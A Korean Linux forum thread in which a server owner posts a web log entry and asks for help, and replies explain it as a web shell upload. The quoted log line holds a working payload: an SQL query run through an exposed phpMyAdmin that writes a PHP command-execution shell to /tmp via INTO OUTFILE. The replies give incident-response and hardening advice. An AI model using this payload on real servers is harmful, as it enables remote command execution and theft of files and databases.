제서버에 남은 웹로그인데 해킹인것같은데요..고수님 조언 부탁드려요 ㅠㅠ 정보
Linux 제서버에 남은 웹로그인데 해킹인것같은데요..고수님 조언 부탁드려요 ㅠㅠ본문
112.219.92.82 - - [24/Mar/2012:01:01:42 +0900] "GET /phpmyadmin/main.php?reload=1&sql_query=select+%27%3C%3Fphp+echo+%5C%27%3Cpre%3E%5C%27%3Bsystem%28%24_GET%5B%5C%27cmd%5C%27%5D%29%3B+echo+%5C%27%3C%2Fpre%3E%5C%27%3B+%3F%3E%27+INTO+OUTFILE+%27%2Ftmp%2F.a%27&token=6447c5d6e0ef4ea9a5807a9cdf775021 HTTP/1.1" 200 7428 "도메인/util/phpmyadmin/server_sql.php?token=6447c5d6e0ef4ea9a5807a9cdf775021" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.26) Gecko/20120128 Firefox/3.6.26"
위와같이 웹로그가 다수 발견되었는데요
phpmyadmin 소스 파일을 웹에서 다운받을수 있게 리스트 보이게 해둿엇는데 그경로 뒤에 이런식으로 쿼리를 남겼네요.. 굵게 표시해놓은 .a 파일이 /tmp 디렉토리에서 발견되었구요..
인젝션이나 그런형태 인건가요?
아이피 변조해서 무수히 많은 로그가 생성되었습니다 ㅠㅠ
zh-CN이건 중국이라는거같기도 하고 ㅠㅠ 조언바랍니다 ㅠㅠ 일단 그경로의 파일은 삭제햇습니다 ㅠㅠ
추천
0
0
댓글 3개
음....정확한건 들어가서 봐야겠지만......phpmyadmin 기본 로그가 저런식으로 남다보니...
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
별다른 의심점은 /tmp 에 파일이 생겼다라는건데....폴더명을 phpmysadmin 이런식으로 쓰는건
위험하구요...조치는 잘 취하신것 처럼보이네욤...
파일 삭제와 더불어 경로변경 , phpmyadmin 버전업 정도 조치 하시면 될듯 한데욤
웹셀 업로드 맞네요. PHP로 보내는 명령을 바로 실행하는 PHP 파일을 만든겁니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
일단 서버내에 파일은 다 털어갈 수 있는 상황이 되었고요.
(소스, db접속 계정 정보, DB 내용)
우선 기본적으로 비밀번호 변경하시고요.
가능한 업데이트 다 해주시고요.
웹셀 이후에 권한 탈취 시도까지는 없었던 것 같습니다만
좀비 PC 가능성도 높으니
ps aux 에서 이상한 프로세스 있으면 삭제해주세요
neststat -a 해서 정체모를 IP로부터 명령 받고있는건 없는지 확인하시고요.
phpmyadmin 경로 변경해서 다른 곳에서 쓰시고
phpmyadmin 최신 버전으로 다시 받으시고요.
MySQL은 해당 서버에서만 접근할 수 있게 IP제한 걸어주시고
PHPMyadmin도 IP 제한 걸면 좋고요.
가능하면 방화벽으로 오픈해야 하는 서비스만 오픈하심이 좋아보이십니다.
phpmyadmin 최신 버전으로 사용하는게 좋겠네요.
phpmyadmin 트래픽 공격도 발생하더군요.
phpmyadmin 트래픽 공격도 발생하더군요.
